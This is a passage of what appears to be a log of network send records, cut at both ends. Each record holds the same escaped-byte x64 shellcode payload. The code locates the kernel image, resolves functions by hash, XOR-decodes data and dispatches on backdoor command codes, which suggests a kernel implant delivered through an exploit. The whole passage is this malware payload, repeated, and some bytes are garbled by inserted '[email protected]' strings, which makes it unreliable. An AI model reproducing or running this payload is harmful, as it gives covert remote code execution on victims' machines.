e0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA 
H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE 
L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 11, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 
\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA 
H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE 
L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 12, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 
\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA 
H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE 
L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 13, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 
\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WV